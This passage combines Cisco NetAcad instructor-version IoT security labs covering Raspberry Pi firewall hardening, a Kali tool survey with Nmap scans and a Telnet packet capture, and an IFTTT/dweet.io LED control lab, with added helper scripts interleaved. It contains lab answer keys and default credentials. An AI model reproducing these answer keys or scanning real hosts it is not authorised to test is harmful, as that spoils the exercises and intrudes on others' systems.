Step 3: Configure firewall rules for the Uncomplicated Firewall (UFW).


a. At this time there are no rules configured in the UFW. However, when the UFW service is started, it
includes a hidden implicit deny rule that blocks any traffic not explicitly allowed. Although this means all
traffic is dropped by default, we want to ensure that specific insecure protocols are denied regardless of
any allow statements configured in the future.
b. Configure a statement to explicitly deny web (HTTP) traffic.
kingbob@IoTpi:~ $ sudo ufw deny http
Rules updated
Rules updated (v6)
c. Configure a statement to explicitly deny Telnet traffic.
kingbob@IoTpi:~ $ sudo ufw deny telnet
Rules updated
Rules updated (v6)
d. Configure a statement to explicitly deny FTP traffic.
kingbob@IoTpi:~ $ sudo ufw deny ftp
Rules updated
Rules updated (v6)

Step 4: View the configured firewall rules for the UFW.


a. To view the rules added to the UFW, enter sudo ufw show added.
kingbob@IoTpi:~ $ sudo ufw show added
Added user rules (see 'ufw status' for running firewall):
ufw deny 80/tcp
ufw deny 23/tcp
ufw deny 21/tcp
b. At this point, we are NOT ready to activate (enable) the UFW service. Because the UFW includes an
implicit deny rule for any traffic not explicitly permitted, we could have our SSH session terminated and be
locked out of the Pi.
c. Configure a statement to explicitly permit secure remote access (SSH).
kingbob@IoTpi:~ $ sudo ufw allow ssh
Rules updated
Rules updated (v6)
d. To activate the UFW firewall, which is disabled by default, enter sudo ufw enable. Ensure that you have
added the allow ssh statement to the UFW before activating the UFW firewall.
kingbob@IoTpi:~ $ sudo ufw enable
Command may disrupt existing ssh connections. Proceed with operation (y|n)? y
Firewall is active and enabled on system startup
Instructor Note: If a student accidentally enables UFW without first permitting SSH, the Pi will be
unreachable over the network. If this occurs, you may be able to access the Pi directly by connecting a
keyboard and monitor, or by creating a new SD card image with PL-App.
e. Observe the UFW firewall rules.
You should see the UFW rules that you have created using the sudo ufw status command.
kingbob@IoTpi:~ $ sudo ufw status
Status: active

To Action From
-- ------ ----
80/tcp DENY Anywhere
23/tcp DENY Anywhere
21/tcp DENY Anywhere
22/tcp ALLOW Anywhere
80/tcp (v6) DENY Anywhere (v6)
23/tcp (v6) DENY Anywhere (v6)
21/tcp (v6) DENY Anywhere (v6)
22/tcp (v6) ALLOW Anywhere (v6)
The ALLOW entries show the connections that are permitted.
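The lockout risk described in step b is easy to script around. The following is an added shell example (not part of the lab or of UFW) that inspects the text of sudo ufw show added and only reports it safe to enable the firewall when an inbound allow or limit rule for SSH is present; the rule sets it checks are constructed from the lab's Step 3 and Step 4 output, and ufw_safe_to_enable is an assumed helper name.

```shell
#!/bin/sh
# Added example (not from the lab): a pre-flight check for "sudo ufw enable".
# UFW's implicit deny means enabling it without an allow (or limit) rule for
# SSH cuts off the session you are working from. The check takes the text of
# "sudo ufw show added" as an argument so it can be exercised on constructed
# input; on a Pi run it as:  ufw_safe_to_enable "$(sudo ufw show added)"

# Return 0 when the rule text on stdin contains an inbound allow or limit rule
# for SSH. Recognised forms: "ufw allow ssh", "ufw allow 22/tcp",
# "ufw limit ssh/tcp", "ufw allow 22" and
# "ufw allow from <net> to any port 22 proto tcp". Outbound rules are ignored.
rules_permit_ssh() {
    grep -E '^ufw (allow|limit) ' \
        | grep -vE '^ufw (allow|limit) out( |$)' \
        | grep -qE '( ssh(/tcp)?$| 22(/tcp)?$| port 22( proto tcp)?$)'
}

# Report whether it is safe to enable the firewall; exit status 0 = safe.
ufw_safe_to_enable() {
    if printf '%s\n' "$1" | rules_permit_ssh; then
        echo "SSH rule present: safe to run 'sudo ufw enable'"
        return 0
    fi
    echo "No inbound SSH allow/limit rule found: add one before enabling UFW" >&2
    return 1
}

# Constructed rule sets: the lab's state after Step 3 (deny rules only) and
# after Step 4c (allow ssh added, which ufw records as 22/tcp).
RULES_STEP3='ufw deny 80/tcp
ufw deny 23/tcp
ufw deny 21/tcp'
RULES_STEP4="$RULES_STEP3
ufw allow 22/tcp"
ufw_safe_to_enable "$RULES_STEP3" || true
ufw_safe_to_enable "$RULES_STEP4"
```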

Step 5: Decrease the threat surface of SSH.


At this time, even though the only accessible service is SSH, SSH can become vulnerable to a brute force
user/password attack. To prevent or better mitigate this threat, a limitation on the number of login attempts in
a specific period of time should be applied.
a. Limit the login attempts for the SSH service using the sudo ufw limit ssh/tcp command.
kingbob@IoTpi:~ $ sudo ufw limit ssh/tcp
Rules updated
Rules updated (v6)
Note: The UFW limit command denies future connections if the same IP address has attempted to
connect six or more times in the last 30 seconds. (This acts as a basic intrusion prevention system (IPS)
for SSH to prevent brute force attacks.)
b. View the UFW rules again using sudo ufw status. What action is now in place for SSH connections
destined for the Pi?
____________________________________________________________________________________
____________________________________________________________________________________

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 7 of 11 www.netacad.com
Lab - Harden a Raspberry Pi

Answers may vary but should include that the action listed is “Limit” which is allowing connections that
authenticate successfully within the first 6 attempts in a period of 30 seconds.
c. According to the UFW rules, if a permit HTTPS rule is NOT created, what will happen to HTTPS traffic
that arrives at the IoTpi interface?
____________________________________________________________________________________
____________________________________________________________________________________
Answers should include that any protocol/service that is not specifically permitted will be denied. HTTPS
sessions targeting the Pi will be denied by the UFW.

Step 6: Run Nmap and set scanning options.


a. Open a terminal on the Kali Linux VM.
b. Perform another Nmap scan targeting the TCP ports of the Pi.
root@kali:~# nmap -p 1-65535 203.0.113.12

Starting Nmap 7.60 ( https://nmap.org ) at 2018-05-04 14:12 EDT


Nmap scan report for 203.0.113.12
Host is up (0.00087s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
22/tcp open ssh
MAC Address: B8:27:EB:AC:8E:B2 (Raspberry Pi Foundation)

Nmap done: 1 IP address (1 host up) scanned in 121.88 seconds


c. The Uncomplicated Firewall (UFW) on the Pi is preventing the scan from accessing the denied services.
Compare the above output with the previous Nmap scan. What protocols are no longer reachable on the
Pi from the Kali VM?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary but should include that when the comparison is done between this Nmap scan and the
one from Part 3 Step 1, both FTP and Telnet are no longer reachable as they have been denied in the
UFW.
How many open ports did Nmap find on the IoT Gateway?
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary based on the lab but should include at a minimum SSH.
What are the associated port numbers and services?
____________________________________________________________________________________
____________________________________________________________________________________
Answers will vary based on the lab but should include at a minimum SSH 22.
d. The Telnet and vsftpd services could also be stopped so that they are no longer running.
kingbob@IoTpi:~ $ sudo systemctl stop openbsd-inetd.service
kingbob@IoTpi:~ $ sudo systemctl stop vsftpd
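To answer the comparison questions in step c mechanically, here is an added shell example (not part of the lab) that diffs the open-port lists of two Nmap reports and also extracts the "Not shown" state, which changes from closed to filtered once UFW drops the probes; the two reports are constructed to mirror the scans in Part 3 Step 1 and Step 6.

```shell
#!/bin/sh
# Added example (not from the lab): compare two Nmap reports for the same host
# and list the ports that were open before the firewall was enabled but are no
# longer reported open afterwards. It also pulls out the "Not shown:" state,
# which flips from "closed" (RST answered) to "filtered" (no answer) once UFW
# drops the packets. The two reports below are constructed to mirror the scans
# in Part 3 Step 1 and Step 6.

BEFORE='Nmap scan report for 203.0.113.12
Host is up (0.00043s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
MAC Address: B8:27:EB:AC:8E:B2 (Raspberry Pi Foundation)
Nmap done: 1 IP address (1 host up) scanned in 17.02 seconds'

AFTER='Nmap scan report for 203.0.113.12
Host is up (0.00087s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
22/tcp open ssh
MAC Address: B8:27:EB:AC:8E:B2 (Raspberry Pi Foundation)
Nmap done: 1 IP address (1 host up) scanned in 121.88 seconds'

# Print "port/proto service" for each port line whose STATE column is open.
open_ports() {
    printf '%s\n' "$1" | awk '$1 ~ "^[0-9]+/(tcp|udp)$" && $2 == "open" { print $1, $3 }'
}

# Print the state Nmap summarised for the unlisted ports (closed or filtered).
not_shown_state() {
    printf '%s\n' "$1" | awk '/^Not shown:/ { print $4 }'
}

# Lines present in the sorted open-port list of report $1 but not of $2.
open_in_first_only() {
    a=$(mktemp); b=$(mktemp)
    open_ports "$1" | LC_ALL=C sort > "$a"
    open_ports "$2" | LC_ALL=C sort > "$b"
    LC_ALL=C comm -23 "$a" "$b"
    rm -f "$a" "$b"
}

# Ports no longer reachable after the change (expected here: 21, 23 and 80).
closed_by_firewall() { open_in_first_only "$1" "$2"; }
# Ports that appeared after the change, which would deserve a second look.
newly_open() { open_in_first_only "$2" "$1"; }

echo "Unlisted ports before: $(not_shown_state "$BEFORE"), after: $(not_shown_state "$AFTER")"
echo "No longer open:"; closed_by_firewall "$BEFORE" "$AFTER"
echo "Newly open:";     newly_open "$BEFORE" "$AFTER"
```

Real scans can be fed in the same way by capturing Nmap's normal output to a file before and after the change (for example with nmap -oN before.txt ...) and passing "$(cat before.txt)" and "$(cat after.txt)".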

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 8 of 11 www.netacad.com
Lab - Harden a Raspberry Pi

Part 4: Cleanup
It is very important to harden any IoT gateway device to protect against cybersecurity incidents. However, for
classroom purposes, the Raspberry Pi device should be returned to its original configuration so that other
users can access it as required for other courses.

Step 1: Restore the default user account.


In this step, the default user account pi is restored with all of its default privileges.
a. Add the user account pi with superuser privileges. Use the default password raspberry for the user pi.
kingbob@IoTpi:~ $ sudo adduser pi
Adding user `pi' ...
Adding new group `pi' (1000) ...
Adding new user `pi' (1000) with group `pi' ...
The home directory `/home/pi' already exists. Not copying from `/etc/skel'.
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for pi
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] y
kingbob@IoTpi:~ $ sudo adduser pi sudo
b. Restore SSH access for all users by deleting the last two lines of the file /etc/ssh/sshd_config, namely
AllowUsers kingbob and DenyUsers kevin. Save the file.
kingbob@IoTpi:~ $ sudo nano /etc/ssh/sshd_config
c. Return the file /etc/sudoers.d/010_pi-nopasswd to its default state by changing kingbob back to pi.
kingbob@IoTpi:~ $ sudo nano /etc/sudoers.d/010_pi-nopasswd
pi ALL=(ALL) NOPASSWD: ALL

Step 2: Disable UFW and restore defaults.


In this step, you will disable and reset UFW.
a. Enter the command sudo ufw reset to disable and reset UFW.
kingbob@IoTpi:~ $ sudo ufw reset
[sudo] password for kingbob:
Resetting all rules to installed defaults. This may disrupt existing ssh
connections. Proceed with operation (y|n)? y
Backing up 'after6.rules' to '/etc/ufw/after6.rules.20181127_000859'
Backing up 'user6.rules' to '/etc/ufw/user6.rules.20181127_000859'
Backing up 'before6.rules' to '/etc/ufw/before6.rules.20181127_000859'
Backing up 'after.rules' to '/etc/ufw/after.rules.20181127_000859'
Backing up 'before.rules' to '/etc/ufw/before.rules.20181127_000859'
Backing up 'user.rules' to '/etc/ufw/user.rules.20181127_000859'
b. Verify that the status of UFW is inactive.
kingbob@IoTpi:~ $ sudo ufw status
c. Before you reboot the Raspberry Pi device, verify that the user pi can log into the device via SSH. Restart
the SSH service and log in as pi.
kingbob@IoTpi:~ $ sudo systemctl restart ssh
kingbob@IoTpi:~ $ ssh pi@localhost
If you are unable to log into the Pi device using the user pi, verify that you have configured the user
account and SSH configurations correctly from the previous steps.
d. Reboot the Raspberry Pi device.

Step 3: Remove unnecessary users.


In this step, you will remove the unnecessary users and their home directories.
a. Log into the Raspberry Pi device as the default user pi.
b. Remove the users kevin and kingbob and their home directories.
pi@IoTpi:~ $ sudo deluser --remove-home kevin
Looking for files to backup/remove ...
Removing files ...
Removing user `kevin' ...
Warning: group `kevin' has no more members.
Done.
pi@IoTpi:~ $ sudo deluser --remove-home kingbob
Looking for files to backup/remove ...
Removing files ...
Removing user `kingbob' ...
Warning: group `kingbob' has no more members.
Done.

Reflection
1. What are some common ports and services that may exist on an IoT device and should be locked down that
were not mentioned in this lab?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary but can include port numbers and/or services such as TFTP using TCP port 69, etc.
2. What type of device could be used to recognize an Nmap scan and actively prevent the port scan and host
sweep?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 10 of 11 www.netacad.com
Lab - Harden a Raspberry Pi

To actively prevent a scan from retrieving details about a host or network, an IPS device would be used. An
IPS could recognize the number of connection attempts from the threat actor as excessive and
block/quarantine the traffic.

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 11 of 11 www.netacad.com
Lab – Investigate Vulnerability Assessment Tools (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Exploring Kali Linux
Part 2: Investigating Nmap and Zenmap
Part 3: Using Wireshark to Open and Analyze a pcap File

Background / Scenario
Kali Linux is a Debian-based Linux distribution that contains tools for advanced penetration testing and
security auditing. Kali contains several hundred tools which are used for a wide variety of information
technology security tasks. In this lab, you will explore some of the tools available in Kali Linux.
Note: Only use Kali tools on networks on which you are authorized to do so.

Required Resources
• PC with at least 1 GB of RAM and 15 GB of free disk space with IoTSec Kali VM

Part 1: Exploring Kali Linux

Step 1: Start the Kali VM.


a. On your PC, open Oracle VirtualBox. Select the IoTSec Kali VM that was installed in a previous lab.
b. Click the green Start arrow in the menu bar. After a brief delay, you should see a new window open that
displays a username field.
c. Enter the username root and click the Next button. Use toor for the password and click Sign in. If you
have typed the username incorrectly, click Cancel to input the correct username.

Step 2: Explore Kali Linux.


Kali Linux contains a number of tools for various information security tasks. To make it easier to use the tools,
they have been organized into different categories.
a. Explore the Kali menus. How many categories of tools are there in Kali Linux?
____________________________________________________________________________________
14 categories of tools

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 4 www.netacad.com
Lab – Investigate Vulnerability Assessment Tools

b. Find each of the tools in the table below in the Kali Applications menu. Investigate each and fill in the
table below. You may need to run the tools to determine the type of interface that is used.
Note: Using any of these tools on actual networks could violate the ethical hacking policy for this course
and may break the law.

Tool        Category        Interface (GUI or Command line)
Nmap
Zenmap
SQLmap
Skipfish
Wireshark

Part 2: Investigating Nmap and Zenmap


Use the “Kali Linux Tools Listing” web page accessible at the link https://tools.kali.org/tools-listing to research
the answers to the following questions:

Step 1: Learning about Nmap


a. Find the Kali Tools page for Nmap. In what two categories is Nmap listed?
____________________________________________________________________________________
____________________________________________________________________________________
Information Gathering and Vulnerability Analysis
b. What is Nmap primarily used for?
____________________________________________________________________________________
____________________________________________________________________________________
Network discovery and security auditing. It discovers hosts on a network and lists various information
about the hosts.
c. Nmap has many options. How does a penetration tester tell Nmap which options to use? (You can see
some of the options in the Nmap Usage Example entry on the Nmap Kali Tools page.)
____________________________________________________________________________________
____________________________________________________________________________________
Options are specified by passing arguments to the Nmap command.
We will use Nmap later in the course.

Step 2: Learning about Zenmap


Zenmap is a network scanning tool that allows you to discover network hosts and resources, including
services, ports, operating systems, and other information. Zenmap should not be used to scan networks
without prior permission. The act of network scanning can be considered a form of network attack.

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 4 www.netacad.com
Lab – Investigate Vulnerability Assessment Tools

a. What is the relationship between Zenmap and Nmap?
____________________________________________________________________________________
____________________________________________________________________________________
Zenmap is a GUI frontend for Nmap.
b. How many default scan profiles are available in Zenmap?
____________________________________________________________________________________
____________________________________________________________________________________
By default, Zenmap has 10 different scan profiles. The profiles are pre-configured settings that define the
options for the scan. Choose a profile by selecting it from the “Profile” combo box. It’s also possible to edit
these profiles or create new ones.
c. When we change the profile, we also see changes in the Command field. What does the Command
field contain?
____________________________________________________________________________________
____________________________________________________________________________________
It contains the Nmap command options that correspond with the profile.

Part 3: Using Wireshark to Open and Analyze a pcap File


Wireshark is a software protocol analyzer, or "packet sniffer" application. Wireshark captures traffic on a
network segment and provides features that simplify analysis of the traffic. Wireshark can be used for learning
about networking, monitoring and troubleshooting networks, and network software development. Wireshark
captures each frame transmitted on the network and provides access to details about the upper levels of the
protocol stack at the internet, transport, and application layers of the TCP/IP model.
a. Open Wireshark in the IoTSec Kali VM by either finding it in the application menu or typing wireshark at
a terminal prompt.
b. Ignore any errors that might appear and go to the Wireshark file menu. Open the file
/root/lab_support_files/PCAP_files/PlainText.pcap.
The pcap file contains a protocol capture of a Telnet session between the client 192.168.0.2 and a Telnet
server. The client is attempting to open a terminal on the server in order to execute commands on it. Use
Wireshark to answer the following questions.
c. What is the IP address of the Telnet server?
____________________________________________________________________________________
192.168.0.1
d. What protocols are used in the captured data conversation?
____________________________________________________________________________________
____________________________________________________________________________________
TCP and Telnet

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 4 www.netacad.com
Lab – Investigate Vulnerability Assessment Tools

e. Go to the Analyze menu and select Follow > TCP Stream. A window appears that shows the data
exchanged between the client and server. The color coding identifies which host is the source of the data.
If you click any part of the conversation, the corresponding frame will be selected in the capture window.
What is the username and password used for authentication of the session?
____________________________________________________________________________________
____________________________________________________________________________________
fake:user
What operating system is running on the server?
____________________________________________________________________________________
OpenBSD
Which commands were sent from the client to be executed on the server?
____________________________________________________________________________________
____________________________________________________________________________________
ping www.yahoo.com, ls -a
How did the server respond?
____________________________________________________________________________________
____________________________________________________________________________________
The server responded with six ping return messages, ping summary statistics, and a listing of directories.
This packet capture illustrates an important security vulnerability that exists in the Telnet protocol. What is
this vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
Telnet sends all data in clear text. The username and password can be read by anyone who could
execute a packet capture on this network segment. In addition, all data that is returned by the server is
also transmitted as clear text. A threat actor could use Wireshark to capture sensitive information in a
Telnet session if access to the network were possible.

 2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 4 www.netacad.com
Lab – Create an IoT Sensor-Actuator System (Instructor Version)
Instructor Note: Red font color and completed code cells indicate that the information appears in the instructor
copy only.

Lab Topology (and Representations)

Connectivity requirements: As shown in the topology, the Raspberry Pi must be able to reach the Internet
and must also be reachable from a student computer via the network so that code can be completed in a
Jupyter Notebook.

Addressing
No specific addressing is required as long as the communications requirements are met.

Objectives
• Build a simple electronic circuit that is under control of the Raspberry Pi.
• Create a simple control app using IFTTT and dweet.io.
• Configure an IFTTT app as a widget in Android or iOS.
• Complete Python code that will control an end-to-end IoT system.
• Use a smartphone to trigger actions on the Raspberry Pi through IFTTT.
• Describe possible security vulnerabilities of such an IoT system.

Background / Scenario
IoT systems often consist not only of sensor and actuator electronics, but also of software applications that
control the systems through a cloud platform. In home automation systems, sensors and actuators in the
home connect to the local network over Wi-Fi and a cloud management platform through the Internet. The
cloud management platform collects data from the IoT system and enables control of it from either a browser
or specialized app that runs on a mobile device.
When evaluating system security, it is useful to break the system down into parts in order to identify different
areas of potential vulnerability.
In this lab, you will build a simple circuit that is controlled by the Raspberry Pi. Then, through the integration of
two web services, you will create a simple app that can control the circuit from a mobile device, either over a
cellular or Wi-Fi connection. To complete this lab, you will use your circuit building and Python skills from the
IoT Connecting Things course. Finally, you will analyze the system to identify potential vulnerabilities at the
device, communication, and application layers of the simplified IoT model.

Required Resources
• PC or laptop
• Raspberry Pi 3, Model B or B+, with PL-App
• Breadboard
• Two 330 Ohm resistors
• Two LEDs, one red and one green
• Jumper wires
• IFTTT account
• Smart phone with recent operating system (Requires iOS 9.0 or higher, or Android devices running 4.1 or
higher.)
• IFTTT app for Android or iOS
• Incoming Internet access to the Raspberry Pi over HTTPS (port 443)
• Network connectivity between host and Raspberry Pi

Part 1: Build and Test the Circuit

Step 1: Build the circuit and connect to the Raspberry Pi


a. Obtain the required components and construct the circuit as shown below. The anode leg of the red LED
is to be connected to GPIO pin number 21 based on the BCM GPIO scheme of the Raspberry Pi 3. The
anode leg of the green LED is to be connected to the GPIO pin number 20 based on the BCM GPIO
scheme of the Raspberry Pi 3.

Use the schematic to make the connection from the circuit to the Raspberry Pi.
Schematic:

Pinouts:

When complete, your circuit should resemble the illustration below:

Step 2: Test the circuit.


Complete and run the code according to the instructions in the code comments. Run the code and observe
the circuit.
a. Import the modules that are required for the lab.
# Code Cell 1.
# Import the dweepy module that is a collection of functions that make it
# easier to communicate with dweet.io
import dweepy

# Import the GPIO modules to control the GPIO pins of the Raspberry Pi
import RPi.GPIO as GPIO

# Import the time module to control the timing of your application (e.g. add delay, etc.)
import time
b. Set up the Raspberry Pi hardware. Add values for the pin numbers for the GreenLEDPin and RedLEDPin
variables. Get the values you need from the circuit connections.
In this code cell, and several others below, students are required to add values to the code. The areas
where values are required are indicated by comments that say "Add values." In addition, the areas of
code requiring completion are indicated with lines of equal signs: ===================.
# Code Cell 2.
#Setup hardware
# Set the desired pin numbering scheme:
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)

#Create variables for the GPIO PINs the LEDs are connected to
# ============================================
# the PIN of the green LED
GreenLEDPin = 20 #Add values: add the pin number for the green LED
# the PIN of the red LED
RedLEDPin = 21 #Add values: add the pin number for the red LED
#=============================================

# Setup the direction of the GPIO pins - either INput or OUTput
# The PINs that connect LEDs must be set to OUTput mode:
GPIO.setup(GreenLEDPin, GPIO.OUT)
GPIO.setup(RedLEDPin, GPIO.OUT)
c. Test your circuit. Turn the LEDs on and off by setting their output values to True or False in the code
below. Add values for the second pair of on and off settings. Use the first set and the comments to guide
you. Timers are used to make it easier to observe the LEDs. Run Code Cells 1, 2, and 3 and observe
the results.
# Code Cell 3.
#Test the circuit by changing the state of the GPIO pins
#This code will cycle twice.
for i in range(2):
    print("Green ON Red Off")
    GPIO.output(GreenLEDPin, True) # True = set 3.3V on the pin
    GPIO.output(RedLEDPin, False) # False = set 0V on the pin
    time.sleep(1) #Wait one second.
    print("Green OFF Red ON")
    #======================================
    GPIO.output(GreenLEDPin, False) # Add values: turn the LED off
    GPIO.output(RedLEDPin, True) # Add values: turn the LED on
    #======================================
    time.sleep(1) #Wait one second.
GPIO.output(RedLEDPin, False) #turn off red LED after loop
What happens when the code successfully runs?
____________________________________________________________________________________
____________________________________________________________________________________
The green LED lights for one second. It goes out and the red LED lights. Then it goes out. This happens
two times.
d. Modify the code to change its behavior. For example, change the number of times that the code cycles
through changing the LED that is lit. Also try changing the time that the LEDs are lit in each cycle.
What did you change in the code to change the number of times that the LEDs cycle?
____________________________________________________________________________________
In Code cell 3, the value passed to the range() function in the for i in range(2): statement.

What did you change in the code to change the time that the LEDs were lit in each cycle?
____________________________________________________________________________________
In code cell 3, the values in one or both of the time.sleep() methods.
If the circuit were attached to different pins on the Pi, what in the code would need to be changed?
____________________________________________________________________________________
In Code Cell 2, the values assigned to the GreenLEDPin and RedLEDPin variables.

Part 2: Create an IFTTT app


As you may remember from IoT Fundamentals Connecting Things lab 5.3.4.4, IFTTT (If This Then That) is a
simple web service that allows the connection of an event to an action. For example, an event, such as a
sensor in the home reaching a threshold value, could be configured to trigger a phone call or text to a
provided smart phone number. This very simple logic can create very rich functionality.
In this lab, we will use an IFTTT widget to detect a button press on a smart phone or tablet. IFTTT will then
trigger a post to a website called dweet.io that serves as a very simple "message broker."
dweet.io allows a user or application to post a message to a website that can then be retrieved by another
application. This is done by creating a "thing." A thing is a virtual object that holds messages. By referring to
the name of the thing in a URL, you can send a message. Similarly, a request can be made to the thing that
allows retrieval of the message by any device that knows the name of the thing. This is useful because these
messages allow different applications to communicate with one another by using the thing as an intermediary.
In a later part of the lab, the Raspberry Pi will detect whether a message has been posted to the thing by a
tap on the IFTTT button widget that has been installed on a smart phone. If a new button tap is detected, the
Pi will actuate the circuit by changing the LED that is lit from green to red or vice versa.

Step 1: Register a free user account at IFTTT


a. Go to the IFTTT website.
b. If you do not have an IFTTT user account, click Sign up to register for free. A valid email address is
required to register a free user account.

Step 2: Create the IFTTT App


a. After signing up and authenticating with your account, click My Applets.
b. Click the Services tab and then click New Applet.
c. Click the blue +this text to select the service that will trigger an action as shown in the figure.

d. In the Search services field, enter button and then click the Button widget tile that appears.

e. Click Connect. On the Choose trigger page, click the Button widget tile.
f. Click the blue +that text to select the action that will be triggered by the Button widget.

g. Type webhooks into the search services field and click the Webhooks tile to select this service as the
action that will be triggered.
h. We now need to enter the URL of the dweet thing that will receive a message sent by the Button
Widget. First, we need to create a name for our thing. The name should be unique in order to make sure
that only messages posted by you will be received by the thing. The name of the thing can contain no
spaces but can be hyphenated. Keep the name of your thing private. There is no account-based security
on dweet.io. We did not even need to register!
Click in the URL field of the Make a web request interface. Enter the following URL, substituting the
name of your thing where indicated. Do not include the {} characters in the URL.
https://dweet.io/dweet/for/{my-thing-name}?text=mydweet
Students will benefit from exploring the dweet.io functionality and API. There is interactive documentation
that allows students to explore various dweet.io functionalities and API concepts. For the sake of brevity,
this material is not covered in this lab.

i. Click Create action to create and Finish to save your app. Your completed applet should look like this:

That is it! This is all that you need to do to create the IFTTT app. The other fields on this screen can be left
unchanged.

Part 3: Download and Configure the IFTTT app on a Smart Phone


Now that the IFTTT applet has been created, create a widget on a smart phone that will control the LED
circuit. The widget will consist of a single button that looks like an icon for a smart phone application. To do
this, install the IFTTT app on the smart phone and then use it to install the applet as a widget.
a. From the Apple Store or Google Play Store, search for, download, and install the IFTTT app onto the
smart phone. The IFTTT app requires iOS 9.0 or higher, and Android devices running version 4.1 or
higher.

b. Install the IFTTT app.


c. In the app, locate the sign in link and sign in with your username and password. You may be prompted to
allow the app to use your location service. This is not necessary.
d. Tap the My Applets icon at the bottom right of the IFTTT app screen. You will see your applet there.
e. Tap the gear icon in the upper right-hand corner of the applet screen and select Widgets.
f. Find your button widget and verify that it is turned on.
g. To add the button widget to your home screen follow the directions that are appropriate for your device.
For Android 4.1 and higher revisions:
1) Go to the device home screen.
2) Press an empty place on the home screen until the home screen configuration menu appears below
the views of the available home screens.
3) Scroll through the available widgets until you find the IFTTT widgets.
4) Tap and hold the IFTTT Small option. You will return to the home screen views. Move to the home
screen that you want to add the widget to and tap the location at which you want to place the widget
icon.
5) You will be returned to the IFTTT app. Tap the widget that you want to add to the selected location.
6) You should now be returned to the home screen and your widget will appear there.
For Apple iOS versions 9.0 and higher.
1) Swipe right over the Home screen to bring up the notification screen.
2) Scroll to the bottom of the screen and tap Edit.
3) Find the IFTTT App and tap the "+" symbol.
4) To finish, tap Done.

Part 4: Program the Raspberry Pi to Work with the App


Complete the code that will allow your Raspberry Pi to detect button pushes that have been sent from the
phone using the IFTTT webhook applet. To do this, you will first initialize an LED on the Raspberry Pi. The
Raspberry Pi will then start to continuously poll the dweet.io thing that was created. The code will compare
the timestamp of the last dweet message received by the thing to the timestamp of the most recent dweet
message. If the timestamps differ, a new button push has been detected. The LED that is lit will turn off and
the other LED will turn on.

Step 1: Prompt the User to Choose an LED to Light


Run the code cells. It is not necessary to run the code that tests your circuit unless you need to verify that the
circuit still works and can be controlled from the Pi.
#Code Cell 4.
while True:
    # Asks the user to select the LED. Put the response into a variable.
    lit = input("Which LED should be lit? (r)ed or (g)reen? (q) to quit: ")
    # convert the input to lowercase and put it in another variable.
    lit1 = lit.lower()
    #Set the LED state based on the user input
    if lit1 == "r": #If the user chose the red LED
        GPIO.output(GreenLEDPin, False) # False = set 0V on the pin
        GPIO.output(RedLEDPin, True) # True = set 3.3V on the pin
        break
    elif lit1 == "g": #If the user chose the green LED
        GPIO.output(GreenLEDPin, True) # True = set 3.3V on the pin
        GPIO.output(RedLEDPin, False) #False = set 0V on the pin
        break
    elif lit1 == "q": #If the user chose to quit the program
        break
    else: #If the user entered something other than r, g, or q.
        print("Please enter r for red, g for green, or q to quit.")

Step 2: Post to your dweet thing at dweet.io.


In this code cell, we will use a special module called dweepy to send messages to a thing at the dweet.io
website.
Create a string variable to hold the name of your dweet thing. The name must match the name you use in
your IFTTT widget exactly. Set the value of the myThing variable to your dweet thing name.
#Code cell 5

#===================
myThing = "your_thing_name" #Add value: add your dweet thing name
#===================

old_dweet = dweepy.dweet_for(myThing, {"dweet": "1"}) #this function sends data to dweet.io

old_created = old_dweet['created'] #get the time stamp of the first dweet

print(old_created)

Step 3: Monitor dweet.io to detect a new button push.


Now, the system needs to monitor the status of the thing on dweet to determine if it has received a button
push from the IFTTT button widget. dweet things have several different default properties that you can read
from the dweet.io website. One of these is the timestamp of the last time the thing was posted to.
We set a variable that holds the timestamp. The code uses a while loop to get the timestamp from the dweet
thing every second. It compares the value of the previous dweet timestamp, which is held in the old_created
variable, to the value of the timestamp for the latest post to the thing. If the timestamps do not match, it is
assumed that a button was pushed on the smart phone.
If a new button push is detected, the currently lit LED is turned off, and the other LED is turned on.
This code uses an endless loop. To stop execution, press the execution button. Some error text may appear
as output below the code cell. This is normal.
#Code cell 6.
counter = 0
while True:
    new_dweet = dweepy.get_latest_dweet_for(myThing) #get latest dweet (returns a list of dweets)
    new_created = new_dweet[0]["created"] #put the created value of the latest dweet into a variable
    if new_created != old_created: #check to see if the old dweet is different from the new dweet
        counter += 1
        print(str(counter) + " New dweet detected!", end='\n')
        old_created = new_created
        if lit1 == "g":
            print("Activate red LED")
            GPIO.output(GreenLEDPin, False) # False = set 0V on the pin
            GPIO.output(RedLEDPin, True) # True = set 3.3V on the pin
            lit1 = "r"
        elif lit1 == "r":
            print("Activate green LED")
            GPIO.output(GreenLEDPin, True)
            GPIO.output(RedLEDPin, False)
            lit1 = "g"
    time.sleep(1)
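Code Cell 6 treats any change of the thing's created timestamp as a button press, and the lab notes that dweet.io has no account-based security, so anyone who learns the thing name can post to it. The following is an added example, not part of the Cisco lab code, that keeps the same polling idea but verifies each dweet before acting on it. It assumes a shared secret token appended to the IFTTT webhook URL as an extra query parameter (a hypothetical addition to the lab's URL) and uses constructed sample dweets in dweet.io's JSON shape; the GPIO calls are replaced by an injectable drive() callable so the logic runs without a Raspberry Pi.

```python
import hmac
from datetime import datetime, timedelta, timezone

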